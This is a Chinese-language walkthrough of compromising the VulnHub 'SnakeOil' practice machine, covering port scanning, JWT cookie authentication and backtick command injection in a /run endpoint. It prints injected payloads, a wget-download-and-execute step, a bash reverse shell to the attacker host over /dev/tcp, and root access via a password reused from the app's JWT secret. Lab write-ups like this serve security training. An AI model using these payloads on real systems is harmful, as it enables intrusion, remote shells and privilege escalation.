所渗透的主机ip为192.168.129.5

端口扫描

┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ sudo nmap --min-rate=10000 -p- 192.168.129.5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-15 14:46 HKT
Nmap scan report for 192.168.129.5 (192.168.129.5)
Host is up (0.28s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy
MAC Address: 08:00:27:6F:04:3B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 16.19 seconds
┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ sudo nmap -sT -sC -sV -O -p22,80,8080 192.168.129.5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-15 14:47 HKT
Nmap scan report for 192.168.129.5 (192.168.129.5)
Host is up (0.00066s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 73:a4:8f:94:a2:20:68:50:5a:ae:e1:d3:60:8d:ff:55 (RSA)
|   256 f3:1b:d8:c3:0c:3f:5e:6b:ac:99:52:80:7b:d6:b6:e7 (ECDSA)
|_  256 ea:61:64:b6:3b:d3:84:01:50:d8:1a:ab:38:29:12:e1 (ED25519)
80/tcp   open  http    nginx 1.14.2
|_http-title: Welcome to SNAKEOIL!
|_http-server-header: nginx/1.14.2
8080/tcp open  http    nginx 1.14.2
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title:  Welcome to Good Tech Inc.'s Snake Oil Project 
MAC Address: 08:00:27:6F:04:3B (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.15 seconds

Web

80端口没有什么有用的信息,8080像是开了一个flask,并且是有业务功能存在,查看”Useful Links”,告知网站使用了jwt身份验证

尝试爆破路由

┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ gobuster dir -u http://192.168.129.5:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.129.5:8080/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/1                    (Status: 200) [Size: 2193]
/01                   (Status: 200) [Size: 2193]
/2                    (Status: 200) [Size: 2356]
/login                (Status: 405) [Size: 64]
/04                   (Status: 200) [Size: 2324]
/02                   (Status: 200) [Size: 2356]
/4                    (Status: 200) [Size: 2324]
/users                (Status: 200) [Size: 140]
/registration         (Status: 200) [Size: 29]
/test                 (Status: 200) [Size: 17]
/create               (Status: 200) [Size: 2596]
/001                  (Status: 200) [Size: 2193]
/002                  (Status: 200) [Size: 2356]
/004                  (Status: 200) [Size: 2324]
/0001                 (Status: 200) [Size: 2193]
/secret               (Status: 500) [Size: 37]
/run                  (Status: 405) [Size: 178]
/0004                 (Status: 200) [Size: 2324]
/0002                 (Status: 200) [Size: 2356]
/000004               (Status: 200) [Size: 2324]
/000002               (Status: 200) [Size: 2356]
/00000001             (Status: 200) [Size: 2193]
/00001                (Status: 200) [Size: 2193]
/000001               (Status: 200) [Size: 2193]
/00004                (Status: 200) [Size: 2324]
/00000002             (Status: 200) [Size: 2356]
/00002                (Status: 200) [Size: 2356]

测试login接口,是一个登录,但是目前没有凭证用于登录

┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ curl -X POST "http://192.168.129.5:8080/login" -d "username=admin&password=admin"
{"message": "User admin doesn't exist"}

还有一个/registration接口,意思就是登记,显示需要用户名和密码,猜测是用于注册用户

┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ curl -X POST "http://192.168.129.5:8080/registration" -d "username=test&password=test" 
{"message": "User test was created. Please use the login API to log in!", "access_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTczNjkyNDgzNiwianRpIjoiZWUwNWVlZWYtMzhjOC00ZTk5LWJjM2EtNTZjYTA1NTc0YmJkIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6InRlc3QiLCJuYmYiOjE3MzY5MjQ4MzYsImV4cCI6MTczNjkyNTczNn0.B3ZDfuzomn7pBJfqzpLNLwWu0lsLTqt41Cx5d0zTs-M"}

成功登录

┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ curl -X POST "http://192.168.129.5:8080/login" -d "username=test&password=test"
{"message": "Logged in as test", "access_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTczNjkyNDg2NiwianRpIjoiYWEzZWJmNDMtNWU4MC00MzZlLTg3NzYtYzFhZDY4M2VmMjRlIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6InRlc3QiLCJuYmYiOjE3MzY5MjQ4NjYsImV4cCI6MTczNjkyNTc2Nn0.EJAq4XxmBQDCie3cO4l1d6z-AhfyjtZ3RGwoiaj0RGE", "refresh_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTczNjkyNDg2NiwianRpIjoiYjdlZGIyZDQtNTMxMi00ZTgxLThjM2EtMTZlMmUzZTFmNDc4IiwidHlwZSI6InJlZnJlc2giLCJzdWIiOiJ0ZXN0IiwibmJmIjoxNzM2OTI0ODY2LCJleHAiOjE3MzY5Mjg0NjZ9.WqZlyTtwo5b6RiLBEu_dn2wkBg8rKqc03HGIbDzc35M"}

/secret接口无法进行访问,尝试/run,告知需要给出一个url但是发现普通的传参无法满足格式,尝试传入JSON

┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ curl -X POST "http://192.168.129.5:8080/run" -H "Content-Type: application/json" -d '{"url":"127.0.0.1:80"}'
{"message":"We need your secret key!","success":false}

但是发现需要secret key,这个是flask中用于会话加解密用的,用于身份验证

回到/secret接口,尝试加上login后得到的token消息,但是仍然无法登录,应该是token的传递有问题

根据主页Useful Link的提示: https://flask-jwt-extended.readthedocs.io/en/stable/options.html#header-options

应该是可以使用传入cookie的形式进行验证,burp进行发包,最好再登录一下获取新的token保证没有过期

GET /secret HTTP/1.1

Host: 192.168.129.5:8080

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Connection: keep-alive

Upgrade-Insecure-Requests: 1

Priority: u=0, i

Cookie: access_token_cookie=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTczNjkyODA2NywianRpIjoiZjI1MWUyMGQtODA2Zi00ODgxLWI0NDctMTJkMmZkM2VjMDU0IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6InRlc3QiLCJuYmYiOjE3MzY5MjgwNjcsImV4cCI6MTczNjkyODk2N30.QcjKXE3MUamnqa5-_zhLwpNj3LtFaKoAUs650gb42D4; refresh_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTczNjkyODA2NywianRpIjoiYjVkOWQ1M2MtMGRiYy00MDk4LTg1YTgtODNkY2E5MzIwMDhjIiwidHlwZSI6InJlZnJlc2giLCJzdWIiOiJ0ZXN0IiwibmJmIjoxNzM2OTI4MDY3LCJleHAiOjE3MzY5MzE2Njd9.kOJp6cyxV_K-IuneZxdDICD0fEOZD1Euo9tGXHTki28

得到secret key commandexecutionissecret

┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ curl -X POST "http://192.168.129.5:8080/run" -H "Content-Type: application/json" -d '{"url":"127.0.0.1:8080","secret_key":"commandexecutionissecret"}'
{"message":"  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0\r100   411  100   411    0     0   200k      0 --:--:-- --:--:-- --:--:--  200k\n","success":false}

本地开启一个http服务并且让其访问,发现接收到了访问

┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ python -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.129.5 - - [15/Jan/2025 16:09:16] "GET / HTTP/1.1" 200 -

尝试命令拼接,但又因为是无回显,所以进行外带

┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ curl -X POST "http://192.168.129.5:8080/run" -H "Content-Type: application/json" -d '{"url":"192.168.129.4:8000/`whoami`","secret_key":"commandexecutionissecret"}'
{"message":"  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0\r100   335  100   335    0     0  55833      0 --:--:-- --:--:-- --:--:-- 55833\n","success":false}

根据日志发现执行成功

┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ python -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.129.5 - - [15/Jan/2025 16:09:16] "GET / HTTP/1.1" 200 -
192.168.129.5 - - [15/Jan/2025 16:10:03] "GET / HTTP/1.1" 200 -
192.168.129.5 - - [15/Jan/2025 16:10:14] "GET / HTTP/1.1" 200 -
192.168.129.5 - - [15/Jan/2025 16:10:21] code 404, message File not found
192.168.129.5 - - [15/Jan/2025 16:10:21] "GET /patrick HTTP/1.1" 404 -

尝试进行反弹shell,但似乎是有过滤关键词

在本地写一个反弹shell文件”hack.sh”

#!/bib/bash
/bin/bash -i >& /dev/tcp/192.168.129.4/1234 0>&1

进行下载至远程主机

┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ curl -X POST "http://192.168.129.5:8080/run" -H "Content-Type: application/json" -d '{"url":"192.168.129.4:8000/`wget http://192.168.129.4:8000/hack.sh -O /tmp/hack.sh`","secret_key":"commandexecutionissecret"}'
{"message":"--2025-01-15 16:26:41--  http://192.168.129.4:8000/hack.sh\nConnecting to 192.168.129.4:8000... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 61 [text/x-sh]\nSaving to: \u2018/tmp/hack.sh\u2019\n\n     0K                                                       100% 11.8M=0s\n\n2025-01-15 16:26:41 (11.8 MB/s) - \u2018/tmp/hack.sh\u2019 saved [61/61]\n\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0\r100   226  100   226    0     0  56500      0 --:--:-- --:--:-- --:--:-- 56500\n","success":false}

给予可执行权限

┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ curl -X POST "http://192.168.129.5:8080/run" -H "Content-Type: application/json" -d '{"url":"192.168.129.4:8000/`chmod +x /tmp/hack.sh`","secret_key":"commandexecutionissecret"}'
{"message":"  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n\r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0\r100   226  100   226    0     0  45200      0 --:--:-- --:--:-- --:--:-- 56500\n","success":false}

开启监听之后,执行反弹shell,成功接收

┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ curl -X POST "http://192.168.129.5:8080/run" -H "Content-Type: application/json" -d '{"url":"192.168.129.4:8000/`/tmp/hack.sh`","secret_key":"commandexecutionissecret"}' 
{"message":"The timeout is expired!","success":false}
┌──(mikannse㉿kali)-[~/vulnhub/snakeoil]
└─$ rlwrap -nAr nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.129.4] from (UNKNOWN) [192.168.129.5] 44100
bash: cannot set terminal process group (468): Inappropriate ioctl for device
bash: no job control in this shell
patrick@SNAKEOIL:~/flask_blog$

提权

发现能够执行任意命令,但是不知道patrick的密码

patrick@SNAKEOIL:~/flask_blog$ sudo -l
sudo -l
Matching Defaults entries for patrick on SNAKEOIL:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User patrick may run the following commands on SNAKEOIL:
    (root) NOPASSWD: /sbin/shutdown
    (ALL : ALL) ALL
patrick@SNAKEOIL:~/flask_blog$ sudo -i
sudo -i
[sudo] password for patrick:

但是在app.py中发现

app.config['SECRET_KEY'] = 'snakeoilisnotgoodforcorporations'
app.config['JWT_COOKIE_SECURE'] = True
app.config['JWT_SECRET_KEY'] = 'NOreasonableDOUBTthisPASSWORDisGOOD'

经尝试,下面那串是patrick的密码,提权成功

patrick@SNAKEOIL:~/flask_blog$ sudo -i
sudo -i
[sudo] password for patrick: NOreasonableDOUBTthisPASSWORDisGOOD

root@SNAKEOIL:~# id
id
uid=0(root) gid=0(root) groups=0(root)